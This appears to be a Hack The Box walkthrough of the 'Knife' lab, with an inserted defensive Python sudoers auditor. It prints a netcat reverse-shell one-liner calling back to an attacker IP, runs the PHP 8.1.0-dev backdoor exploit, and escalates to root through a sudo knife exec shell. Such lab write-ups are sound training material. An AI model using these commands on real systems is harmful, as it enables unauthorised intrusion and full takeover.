Knife HacktheBox Walkthrough

Today we are going to solve the lab named Knife from Hack the Box. The purpose is to accept the challenge and root the machine, which involves remote code execution to get a foothold and abuse of sudo rights to pwn the victim's machine.

Level: Easy

Table of Content

Network Scanning

  • Nmap

Enumeration

  • Nikto

Exploitation

  • RCE (Python)
  • user.txt

Privilege Escalation

  • Sudo Rights
  • root.txt


Kali: Attacker Machine

Victim’s Machine: HTB

Network Scanning

Run Nmap to find the open ports and services.

nmap -A 10.129.223.91

As per the Nmap result, two ports are open: port 80 (HTTP) and port 22 (SSH).

So our only avenues of attack are port 80 and port 22.

At first look, we browse to port 80 in the web browser, but nothing informative is found there.

http://10.129.223.91

Enumeration

Without losing hope, we move forward with the web scanner Nikto to look for vulnerabilities, if any. Run the command below; the output reveals the X-Powered-By header as PHP/8.1.0-dev.

nikto -h 10.129.223.91

Let's Google for a PHP 8.1 exploit.

From the search we find that this PHP 8.1 development build is vulnerable and allows remote code execution. If this version runs on a server, an attacker can execute arbitrary code by sending a crafted User-Agent header.

On Exploit-DB we find the exploit EDB-ID 49933. Download the script from the link below and save it.

URL: https://www.exploit-db.com/exploits/49933

Exploitation

Execute the downloaded script on Kali and enter the full host URL of the victim's machine (the HTB machine). At the same time, run a netcat listener on port 1234 in another terminal.

nc -lvp 1234
python3 49933.py
http://10.129.223.91

In the above screenshot, the shell returned by the script is garbled and unreliable. Let's get a proper reverse shell by running the following command through it:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.100 1234 >/tmp/f

Wow!! On the netcat terminal we have a session, and now the journey of enumeration starts; we grab user.txt.

But our hunger is for root.txt. Let's proceed to the root flag.

We notice something interesting in the sudo rights.

sudo -l

Privilege Escalation

As shown in the above screenshot, the user james may run /usr/bin/knife as root, because he has sudo privileges for it with no password required.

Let's see what GTFOBins says about knife:

knife: it is capable of running Ruby code. If the binary is allowed to run as a superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

Refer: https://gtfobins.github.io/gtfobins/knife/#sudo
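From the defender's side, the weakness here is the sudoers rule itself, not knife. The following added example (not part of the walkthrough or of the box) parses sudoers(5)-style rules and flags NOPASSWD grants of ALL or of a shell-capable binary; the SHELL_CAPABLE list and the sample sudoers file are constructed assumptions, with knife taken from this box.

```python
import re
# Constructed sample: binaries that keep root's privileges and can spawn a shell
# under sudo (knife is the one abused on this box; see GTFOBins for others).
SHELL_CAPABLE = {"/usr/bin/knife", "/usr/bin/vim", "/usr/bin/find", "/bin/bash"}
TAGS = ("NOPASSWD", "PASSWD", "SETENV", "NOSETENV", "NOEXEC", "EXEC")
TAG_RE = re.compile(r"\b(" + "|".join(TAGS) + r"):\s*")
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
                     r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

# Constructed sample /etc/sudoers; not the box's real file.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
james   ALL=(root) NOPASSWD: /usr/bin/knife
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, PASSWD: /usr/bin/vim
ops     ALL=(ALL) NOPASSWD:ALL
"""


def parse_rule(line):
    """Parse a sudoers(5) rule into (user, runas, [(nopasswd, command), ...]);
    None for blanks, comments, Defaults and *_Alias lines."""
    line = line.split("#", 1)[0].strip()
    m = RULE_RE.match(line)
    if not m or m["user"].startswith("Defaults") or m["user"].endswith("_Alias"):
        return None
    nopasswd, commands = False, []
    for spec in m["cmds"].split(","):
        # Normalise "NOPASSWD:ALL" to "NOPASSWD: ALL"; a tag stays in force for later commands.
        tokens = TAG_RE.sub(r"\1: ", spec).split()
        while tokens and tokens[0].endswith(":") and tokens[0][:-1] in TAGS:
            tag = tokens.pop(0)[:-1]
            if tag in ("NOPASSWD", "PASSWD"):
                nopasswd = tag == "NOPASSWD"
        if tokens:
            commands.append((nopasswd, " ".join(tokens)))
    return m["user"], m["runas"] or "root", commands


def audit_sudoers(text):
    """Return (user, runas, command) for each NOPASSWD grant of ALL or a
    shell-capable binary; arguments after the path are kept for context."""
    findings = []
    for user, runas, commands in filter(None, map(parse_rule, text.splitlines())):
        for nopasswd, command in commands:
            if nopasswd and command.split()[0] in SHELL_CAPABLE | {"ALL"}:
                findings.append((user, runas, command))
    return findings
```

Running audit_sudoers(SAMPLE_SUDOERS) flags james for /usr/bin/knife and ops for ALL, while the password-protected vim rule for backup is not reported.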

Below are the commands to run:

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
cd /root
ls
cat root.txt

Finally, we capture the flag.

Author: Nisha Sharma is an experienced and certified Security Consultant, highly skilled in infrastructure and web pentesting along with SIEM and other security devices.